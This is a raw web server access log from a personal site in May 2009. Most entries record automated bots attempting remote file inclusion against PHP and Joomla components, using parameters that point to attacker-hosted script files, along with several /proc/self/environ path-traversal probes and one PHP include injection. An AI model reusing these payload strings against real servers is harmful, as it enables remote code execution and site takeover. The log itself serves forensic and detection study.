212.150.52.114 - - [20/May/2009:10:51:11 -0700] "GET /logs/access_081104.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:51:14 -0700] "GET /logs/access_081104.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:51:21 -0700] "GET /index.php?option=com_content&task=view&id=141&Itemid=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 42010 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:51:25 -0700] "GET /?option=com_artlinks&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 42111 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:51:25 -0700] "GET /logs/access_080624.log//?option=com_artlinks&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.26.5 - - [20/May/2009:10:51:37 -0700] "GET /logs/access_080928.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:51:38 -0700] "GET /logs/access_081223.log//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:51:39 -0700] "GET /?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 8039 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:51:40 -0700] "GET /logs//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 100339 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.26.5 - - [20/May/2009:10:51:49 -0700] "GET /logs/access_080329.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:51:57 -0700] "GET /logs/access_080512.log%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:10:51:59 -0700] "GET /logs/access_080512.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.75.4.169 - - [20/May/2009:10:52:00 -0700] "GET /logs//?option=com_events&Itemid=312&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 200 100339 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:10:52:06 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.42 - - [20/May/2009:10:52:06 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:10:52:20 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:52:42 -0700] "GET /logs/access_081223.log//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.127.15 - - [20/May/2009:10:52:43 -0700] "GET /logs/access_090312.log/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:52:43 -0700] "GET /?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 8039 "-" "libwww-perl/5.805" "www.dmulk.com"
202.75.4.169 - - [20/May/2009:10:52:44 -0700] "GET /?option=com_events&Itemid=312&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 200 42125 "-" "libwww-perl/5.79" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:52:45 -0700] "GET /logs//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 100339 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:52:58 -0700] "GET /logs/access_090407.log//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:53:02 -0700] "GET /logs/access_090407.log//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:53:02 -0700] "GET /logs/access_080812.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:53:03 -0700] "GET /logs/access_080211.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [20/May/2009:10:53:09 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [20/May/2009:10:53:09 -0700] "GET /logs//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [20/May/2009:10:53:10 -0700] "GET /logs/access_090217.log//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:53:36 -0700] "GET /logs/access_090210.log//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:47 -0700] "GET /logs/access_080524.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:47 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:47 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:47 -0700] "GET /logs/access_081124.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:48 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:48 -0700] "GET /logs/access_080524.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:48 -0700] "GET /logs/access_081124.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:49 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:49 -0700] "GET /logs/access_080524.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:49 -0700] "GET /logs/access_081124.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:49 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:49 -0700] "GET /logs/access_081124.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:49 -0700] "GET /logs/access_080524.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:10:53:51 -0700] "GET /logs/access_090119.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.86.125 - - [20/May/2009:10:53:51 -0700] "GET /logs/access_081115.log/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:51 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:53:51 -0700] "GET /logs/access_081117.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:10:53:51 -0700] "GET /logs/access_080929.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:51 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:53:51 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
87.230.86.125 - - [20/May/2009:10:53:52 -0700] "GET /xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.230.86.125 - - [20/May/2009:10:53:52 -0700] "GET /logs/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
202.53.250.98 - - [20/May/2009:10:53:53 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.98 - - [20/May/2009:10:53:53 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.98 - - [20/May/2009:10:53:53 -0700] "GET /logs/access_080402.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.53.250.98 - - [20/May/2009:10:53:53 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:10:53:54 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:54:01 -0700] "GET /logs/access_081117.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:10:54:06 -0700] "GET /logs/access_081117.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:10:54:10 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:10:54:25 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:54:33 -0700] "GET /logs/access_090210.log//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.65.10.238 - - [20/May/2009:10:54:35 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpmyadmin/README?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.65.10.238 - - [20/May/2009:10:54:35 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpmyadmin/README?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.65.10.238 - - [20/May/2009:10:54:35 -0700] "GET /logs/access_090410.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpmyadmin/README?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.65.10.238 - - [20/May/2009:10:54:40 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpmyadmin/README?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:10:54:48 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 200 41991 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:03 -0700] "GET /logs//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:03 -0700] "GET /logs/access_080708.log//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:03 -0700] "GET /include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:03 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:10 -0700] "GET /logs/access_080708.log//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:10 -0700] "GET /include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:10 -0700] "GET /logs//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:10 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.86.125 - - [20/May/2009:10:56:30 -0700] "GET /logs/access_090312.log/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:45 -0700] "GET /skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:45 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.65.10.238 - - [20/May/2009:10:56:45 -0700] "GET /logs/access_090410.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpmyadmin/README?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.65.10.238 - - [20/May/2009:10:56:50 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpmyadmin/README?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:10:56:51 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:10:56:51 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:10:56:51 -0700] "GET /inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:10:56:52 -0700] "GET /logs/access_081030.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:52 -0700] "GET /logs/access_080401.log//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:55 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:56:55 -0700] "GET /skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:57:04 -0700] "GET /logs/access_080401.log//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:57:05 -0700] "GET /skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:57:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:57:06 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:57:08 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:57:08 -0700] "GET /skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:57:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:57:27 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:57:32 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.12.112.25 - - [20/May/2009:10:57:49 -0700] "GET /logs/access_090409.log/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.12.112.25 - - [20/May/2009:10:57:49 -0700] "GET /xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.12.112.25 - - [20/May/2009:10:57:49 -0700] "GET /logs/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.12.112.25 - - [20/May/2009:10:57:55 -0700] "GET /logs/access_090312.log/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:10:58:52 -0700] "GET /logs//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:10:58:52 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:10:58:52 -0700] "GET /include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:10:59:02 -0700] "GET /logs/access_090108.log//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:10:59:04 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:10:59:04 -0700] "GET /logs//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:10:59:04 -0700] "GET /include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:10:59:22 -0700] "GET /logs/access_090108.log//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:10:59:33 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:10:59:33 -0700] "GET /logs/access_081010.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:10:59:33 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:10:59:33 -0700] "GET /logs/access_090313.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.38.181.51 - - [20/May/2009:10:59:59 -0700] "GET /logs/access_080708.log//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.38.181.51 - - [20/May/2009:10:59:59 -0700] "GET /include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
